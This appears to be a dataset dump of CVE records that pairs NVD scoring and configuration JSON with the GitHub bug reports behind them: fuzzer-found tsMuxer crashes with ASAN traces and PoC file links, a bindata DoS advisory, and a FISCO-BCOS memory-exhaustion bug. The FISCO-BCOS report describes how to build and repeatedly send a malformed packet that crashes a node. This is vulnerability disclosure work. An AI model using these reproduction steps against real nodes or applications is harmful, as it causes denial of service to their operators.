Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec**. System info: ``` Ubuntu 21.04 tsMuxeR version git-f6ab2a2 ``` To run PoC after unzip: ``` $ ./tsmuxer decoder_poc ``` [decoder_poc.zip](https://github.com/justdan96/tsMuxer/files/6534193/decoder_poc.zip) ### References: [https://cwe.mitre.org/data/definitions/369.html](https://cwe.mitre.org/data/definitions/369.html) ASAN output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer AddressSanitizer:DEADLYSIGNAL ================================================================= ==2890753==ERROR: AddressSanitizer: FPE on unknown address 0x000000444db8 (pc 0x000000444db8 bp 0x7ffd085984a0 sp 0x7ffd085983a0 T0) #0 0x444db8 in AC3Codec::decodeDtsHdFrame(unsigned char*, unsigned char*) /src/build/../tsMuxer/ac3Codec.cpp:377:65 #1 0x4478d9 in AC3Codec::decodeFrame(unsigned char*, unsigned char*, int&) /src/build/../tsMuxer/ac3Codec.cpp:428:34 #2 0x7c61df in SimplePacketizerReader::checkStream(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/simplePacketizerReader.cpp:257:13 #3 0x6cf93a in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:755:20 #4 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #5 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #6 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #7 0x7f2c99a1a564 in __libc_start_main csu/../csu/libc-start.c:332:16 #8 0x2ebded in _start (/home/Fuzzer_Instance_29/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: FPE /src/build/../tsMuxer/ac3Codec.cpp:377:65 in AC3Codec::decodeDtsHdFrame(unsigned char*, unsigned char*) ==2890753==ABORTING ```
Divide-by-zero in AC3Codec::decodeDtsHdFrame
https://api.github.com/repos/justdan96/tsMuxer/issues/428/comments
0
2021-05-24T18:10:51Z
2022-06-23T07:20:06Z
https://github.com/justdan96/tsMuxer/issues/428
899,886,480
428
2,105
CVE-2021-34070
2021-06-23T22:15:08.590
Out-of-bounds Read in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/426" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/429/files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/426" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/429/files" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/justdan96/tsMuxer/issues/426
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Greetings, tsMuxer has an Out-of-bounds Read issue whenever runs with the PoC sample. Found by **Cem Onat Karagun of Diesec** System info: ``` Ubuntu 21.04 tsMuxeR version git-f6ab2a2 ``` To run PoC after unzip: ``` $ ./tsmuxer global_oob ``` [global_oob.zip](https://github.com/justdan96/tsMuxer/files/6532598/global_oob.zip) Chronological Function-Call Trace: 1. detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 2. METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 3. METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:765:21 4. VC1StreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/vc1StreamReader.cpp:146:28 5. VC1SequenceHeader::decode_sequence_header() /src/build/../tsMuxer/vc1Parser.cpp:156:20 6. VC1SequenceHeader::decode_sequence_header_adv() /src/build/../tsMuxer/vc1Parser.cpp:279:37 ### Root Cause of The Issue: Constant integer arrays are defined in vc1Parser.h: ```cpp line 39, 40: const int ff_vc1_fps_nr[5] = {24, 25, 30, 50, 60}; const int ff_vc1_fps_dr[2] = {1000, 1001}; ``` However, the array index nr is set to 7 therefore [nr-1] is larger than boundary of array ff_vc1_fps_nr. ```cpp (gdb) b *0x0000000000934072 Breakpoint 7 at 0x934072: file ../tsMuxer/vc1Parser.cpp, line 274. (gdb) p nr $7 = 7 (gdb) p ff_vc1_fps_nr $8 = {24, 25, 30, 50, 60} (gdb) p ff_vc1_fps_dr $17 = {1000, 1001} line 276: if (nr && nr < 8 && dr && dr < 3) line: 279: time_base_den = ff_vc1_fps_nr[nr - 1] * 1000; ``` A similar "demo" issue is also shared in following page: [https://github.com/google/sanitizers/wiki/AddressSanitizerExampleGlobalOutOfBounds](https://github.com/google/sanitizers/wiki/AddressSanitizerExampleGlobalOutOfBounds) I'm sharing the link above, because ASAN declares this issue as "global-buffer-overflow" but as shared in References and root-cause sections this is actually a OOB read issue. ### Recommendation: Editing size-check of "array index" within "if condition" in line 276 might fix this "particular" issue. An additional check of index variables (dr and nr) for ">= 0" is **recommended**. ### PoC Fix: ```cpp - if (nr && nr < 8 && dr && dr < 3) + if (nr && nr < 5 && nr >= 0 && dr && dr < 3 && dr >= 0) ``` ### References: [https://cwe.mitre.org/data/definitions/125.html](https://cwe.mitre.org/data/definitions/125.html) ### Address Sanitizer Output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer ================================================================= ==1861865==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000299234 at pc 0x00000093540f bp 0x7fffda9f6e10 sp 0x7fffda9f6e08 READ of size 4 at 0x000000299234 thread T0 #0 0x93540e in VC1SequenceHeader::decode_sequence_header_adv() /src/build/../tsMuxer/vc1Parser.cpp:279:37 #1 0x93264d in VC1SequenceHeader::decode_sequence_header() /src/build/../tsMuxer/vc1Parser.cpp:156:20 #2 0x940715 in VC1StreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/vc1StreamReader.cpp:146:28 #3 0x6d090e in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:765:21 #4 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #5 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #6 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #7 0x7f5f89b14564 in __libc_start_main csu/../csu/libc-start.c:332:16 #8 0x2ebded in _start (/home/X/tsMuxer/bin/tsMuxeR+0x2ebded) 0x000000299234 is located 44 bytes to the left of global variable '<string literal>' defined in '../tsMuxer/bitStream.h:131:9' (0x299260) of size 15 '<string literal>' is ascii string 'num <= INT_BIT' 0x000000299234 is located 0 bytes to the right of global variable 'ff_vc1_fps_nr' defined in '../tsMuxer/vc1Parser.h:39:11' (0x299220) of size 20 SUMMARY: AddressSanitizer: global-buffer-overflow /src/build/../tsMuxer/vc1Parser.cpp:279:37 in VC1SequenceHeader::decode_sequence_header_adv() Shadow bytes around the buggy address: 0x00008004b1f0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 02 f9 f9 0x00008004b200: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 00 06 f9 f9 0x00008004b210: f9 f9 f9 f9 03 f9 f9 f9 f9 f9 f9 f9 00 05 f9 f9 0x00008004b220: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 00 00 00 0x00008004b230: 00 00 00 00 00 00 03 f9 f9 f9 f9 f9 00 f9 f9 f9 =>0x00008004b240: f9 f9 f9 f9 00 00[04]f9 f9 f9 f9 f9 00 07 f9 f9 0x00008004b250: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 00 00 0x00008004b260: 00 05 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00 0x00008004b270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008004b280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x00008004b290: 00 00 00 00 00 00 01 f9 f9 f9 f9 f9 06 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1861865==ABORTING ```
Out-of-bounds Read in VC1SequenceHeader::decode_sequence_header_adv of vc1Parser.cpp
https://api.github.com/repos/justdan96/tsMuxer/issues/426/comments
2
2021-05-24T13:22:08Z
2022-06-23T07:19:06Z
https://github.com/justdan96/tsMuxer/issues/426
899,655,214
426
2,106
CVE-2021-34071
2021-06-23T22:15:08.633
Heap based buffer overflow in tsMuxer 2.6.16 allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/423
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec** System info: Ubuntu 21.04 tsMuxeR version git-f6ab2a2 To run PoC: ``` $ ./tsmuxer crash_1 ``` Asan output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer ================================================================= ==2834234==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6100000007f5 at pc 0x00000077f724 bp 0x7ffebdd7b690 sp 0x7ffebdd7b688 READ of size 1 at 0x6100000007f5 thread T0 #0 0x77f723 in SEIUnit::deserialize(SPSUnit&, int) /src/build/../tsMuxer/nalUnits.cpp:2009:20 #1 0x4e3408 in H264StreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/h264StreamReader.cpp:142:25 #2 0x6ceacc in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:745:21 #3 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #4 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #5 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #6 0x7fb1de23a564 in __libc_start_main csu/../csu/libc-start.c:332:16 #7 0x2ebded in _start (/home/Fuzzer_Instance_4/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) 0x6100000007f5 is located 0 bytes to the right of 181-byte region [0x610000000740,0x6100000007f5) allocated by thread T0 here: #0 0x39823d in operator new[](unsigned long) (/home/Fuzzer_Instance_4/txmux/tsMuxer/bin/tsMuxeR+0x39823d) #1 0x74f45d in NALUnit::decodeBuffer(unsigned char const*, unsigned char const*) /src/build/../tsMuxer/nalUnits.cpp:282:19 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/nalUnits.cpp:2009:20 in SEIUnit::deserialize(SPSUnit&, int) Shadow bytes around the buggy address: 0x0c207fff80a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c207fff80b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa 0x0c207fff80c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c207fff80d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c207fff80e0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 =>0x0c207fff80f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00[05]fa 0x0c207fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2834234==ABORTING ```
heap-buffer-overflow in SEIUnit::deserialize
https://api.github.com/repos/justdan96/tsMuxer/issues/423/comments
1
2021-05-22T16:27:04Z
2022-06-23T07:19:39Z
https://github.com/justdan96/tsMuxer/issues/423
898,836,591
423
2,107
CVE-2021-32823
2021-06-24T00:15:08.103
In the bindata RubyGem before version 2.4.10 there is a potential denial-of-service vulnerability. In affected versions it is very slow for certain classes in BinData to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002, BinData::Bit<N>. In combination with <user_input>.constantize there is a potential for a CPU-based DoS. In version 2.4.10 bindata improved the creation time of Bits and Integers.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/#update-bindata-dependency" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/dmendel/bindata/blob/v2.4.10/ChangeLog.rdoc#version-2410-2021-05-18-" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dmendel/bindata/commit/d99f050b88337559be2cb35906c1f8da49531323" }, { "source": "security-advisories@github.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rubysec/ruby-advisory-db/issues/476" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://rubygems.org/gems/bindata" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/#update-bindata-dependency" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/dmendel/bindata/blob/v2.4.10/ChangeLog.rdoc#version-2410-2021-05-18-" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dmendel/bindata/commit/d99f050b88337559be2cb35906c1f8da49531323" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rubysec/ruby-advisory-db/issues/476" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://rubygems.org/gems/bindata" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bindata_project:bindata:*:*:*:*:*:ruby:*:*", "matchCriteriaId": "F3FDB12D-A7D5-4E28-9515-94054E69934D", "versionEndExcluding": "2.4.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "matchCriteriaId": "4DCC45E4-7F83-4352-A2E0-3F07A7B718A2", "versionEndExcluding": "13.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "70D08D88-CFDF-48ED-B767-BA4A048DA9CD", "versionEndExcluding": "13.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "matchCriteriaId": "299084AF-AA62-4503-B9E8-3D44898553DF", "versionEndExcluding": "13.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "36C14C68-B2DB-4EDB-9604-764D5CEC8C2C", "versionEndExcluding": "13.11.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "matchCriteriaId": "F16BCB65-EA10-492B-B921-5F90632BA5E5", "versionEndExcluding": "13.12.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "B3020FB1-3219-41FB-9E06-282E9F8075DD", "versionEndExcluding": "13.12.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.12.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/rubysec/ruby-advisory-db/issues/476
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rubysec", "ruby-advisory-db" ]
Potential DoS (combined with `constantized` - see https://blog.presidentbeef.com/blog/2020/09/14/another-reason-to-avoid-constantize-in-rails/ for background) which was fixed in https://github.com/dmendel/bindata/commit/d99f050b88337559be2cb35906c1f8da49531323 as part of bindata 2.4.10 No CVE yet
Add advisory for bindata
https://api.github.com/repos/rubysec/ruby-advisory-db/issues/476/comments
7
2021-06-01T21:41:34Z
2021-06-24T01:48:09Z
https://github.com/rubysec/ruby-advisory-db/issues/476
908,710,715
476
2,108
CVE-2021-35041
2021-06-24T00:15:08.300
The blockchain node in FISCO-BCOS V2.7.2 may have a bug when dealing with unformatted packet and lead to a crash. A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably and crash. More details are shown at: https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fisco-bcos:fisco-bcos:2.7.2:*:*:*:*:*:*:*", "matchCriteriaId": "C83C47C2-3E89-492E-B410-4436C744BB1D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "FISCO-BCOS", "FISCO-BCOS" ]
**Describe the bug** A malicious node can send a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume the memory sustainably, as the flowing figure shows: ![Figure_1](https://user-images.githubusercontent.com/22519865/122045385-3cd01300-ce10-11eb-8536-32316b9009a6.png) After 100 seconds, over 4000 MB memory has been consumed. If I continue sending the packet, the node will consume all the memory. At last it be killed by the OS. In order to analyze the reason for this bug, I try to debug the code of the node. Here is what I found: First, I found that in the file `libp2p/P2PMessageRC2.cpp`, at line 109 in the function `decode`: ```C++ ssize_t P2PMessageRC2::decode(const byte* buffer, size_t size) { ... m_length = ntohl(*((uint32_t*)&buffer[offset])); if (size < m_length) { return dev::network::PACKET_INCOMPLETE; } ... } ``` the variable `size` is 72 and the variable `m_length` is a very big number under my packet. So the function will return `dev::network::PACKET_INCOMPLETE` whose value is 0. The variable which accepts the return value is `result` in `libnetwork/Session.cpp` at line 421 in the function `doRead`: ```C++ ssize_t result = message->decode(s->m_data.data(), s->m_data.size()); ``` and the program will enter into a if-else cluse: ```C++ if (result > 0){ ... } else if (result == 0) { s->doRead(); break; } else { ... } ``` Because the value of `result` is 0, so here the program will call the function `doRead` recursively. If I delete this call, the problem will not occur anymore. ```C++ else if (result == 0) { // s->doRead(); break; } ``` So I think the reason maybe the developers forget to release certain memory before the return statement if the packet is not decoded correctly! **To Reproduce** Steps to reproduce the behavior: 1. Construct a P2P packet which claims to have a big length (set a big value for variable `m_length`) 2. Continuously send the packet to a running node 3. The node will consume the memory continuously and crash. **Expected behavior** By handling the abnormal packets correctly, the memory cost will not sustainably increase and the node will not crash. **Screenshots** I have give the screenshots of the memory usage of the node in the description part. **Environment (please complete the following information):** - OS: Ubuntu 16.04 - FISCO BCOS Version: v2.7.2 **Additional context** None!
The node may have a bug when dealing with unformatted packet and lead to a crash
https://api.github.com/repos/FISCO-BCOS/FISCO-BCOS/issues/1951/comments
2
2021-06-15T12:05:29Z
2022-03-02T10:21:17Z
https://github.com/FISCO-BCOS/FISCO-BCOS/issues/1951
921,324,656
1,951
2,109
CVE-2020-18661
2021-06-24T15:15:08.113
Cross Site Scripting (XSS) vulnerability in gnuboard5 <=v5.3.2.8 via the url parameter to bbs/login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
